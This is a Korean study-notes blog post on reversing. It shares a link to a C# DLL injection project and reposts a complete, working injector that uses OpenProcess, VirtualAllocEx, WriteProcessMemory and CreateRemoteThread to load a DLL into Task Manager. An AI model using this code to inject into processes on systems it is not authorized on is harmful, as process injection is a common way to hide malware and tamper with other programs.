알쓸전컴(알아두면 쓸모있는 전자 컴퓨터)
C# dll injection 오픈소스 사이트 공유 본문
C# dll injection 오픈소스 사이트 공유
공부 중에 C# dll injection 이 궁금 해서 찾아 보았다,
해당 프로젝트 에서는 dll inject 과 예제로 사용할 소스까지 나와 있다 추후 분석을 하기 위해서 공유해 두려 한다.
https://github.com/ChadSki/SharpNeedle
또 다른 사이트에서의 simple 예제 코드를 공유 합니다.
출처 : https://rstforums.com/forum/topic/103107-c-dll-injection/
using System; using System.Collections.Generic; using System.Text; using System.Threading; using System.Runtime.InteropServices; using System.Diagnostics; using System.IO; using System.Reflection; namespace alphabotcsharp { public class Injection { [DllImport("kernel32.dll")] public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll", CharSet = CharSet.Auto)] public static extern IntPtr GetModuleHandle(string lpModuleName); [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll", SetLastError = true)] static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); // privileges const int PROCESS_CREATE_THREAD = 0x0002; const int PROCESS_QUERY_INFORMATION = 0x0400; const int PROCESS_VM_OPERATION = 0x0008; const int PROCESS_VM_WRITE = 0x0020; const int PROCESS_VM_READ = 0x0010; // used for memory allocation const uint MEM_COMMIT = 0x00001000; const uint MEM_RESERVE = 0x00002000; const uint PAGE_READWRITE = 4; public static bool isInjected = false; [DllImport("kernel32.dll", SetLastError = true, CallingConvention = CallingConvention.Winapi)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool IsWow64Process( [In] IntPtr hProcess, [Out] out bool wow64Process ); static bool is64BitProcess = (IntPtr.Size == 8); static bool is64BitOperatingSystem = is64BitProcess || InternalCheckIsWow64(); public static int inject(string dllPath, Process tProcess) { Process targetProcess = tProcess; string dllName = dllPath; // the target process // geting the handle of the process - with required privileges IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id); // searching for the address of LoadLibraryA and storing it in a pointer IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); // name of the dll we want to inject // alocating some memory on the target process - enough to store the name of the dll // and storing its address in a pointer IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // writing the name of the dll there UIntPtr bytesWritten; WriteProcessMemory(procHandle, allocMemAddress, Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten); // creating a thread that will call LoadLibraryA with allocMemAddress as argument CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero); return 0; } public static void Execute() { string rawDLL = String.Empty; if(is64BitOperatingSystem) { rawDLL = Path.Combine(Path.GetDirectoryName(Assembly.GetEntryAssembly().Location), "h64.dll"); } else { rawDLL = Path.Combine(Path.GetDirectoryName(Assembly.GetEntryAssembly().Location), "h32.dll"); } // Execution of injection Process proc = Process.GetProcessesByName("taskmgr")[0]; Injection.inject(rawDLL, proc); isInjected = true; } public static Boolean isInjectedAlready() { if(isInjected) { return true; } else { return false; } } public static bool InternalCheckIsWow64() { if ((Environment.OSVersion.Version.Major == 5 && Environment.OSVersion.Version.Minor >= 1) || Environment.OSVersion.Version.Major >= 6) { using (Process p = Process.GetCurrentProcess()) { bool retVal; if (!IsWow64Process(p.Handle, out retVal)) { return false; } return retVal; } } else { return false; } } } }
'리버싱' 카테고리의 다른 글
UPX packing 과 unpacking (2) (0) | 2018.06.19 |
---|---|
UPX packing 과 unpacking (1) (0) | 2018.05.28 |
windows 후킹에 관련되 좋은 자료 공유 (0) | 2018.05.27 |
ollydbg 대체용 프로그램 x64dbg 소개 (2) | 2018.05.26 |
C# 리버싱을 위한 기초 공부 참고 자료 Inside C#_2E.pdf (3) | 2018.05.21 |
Comments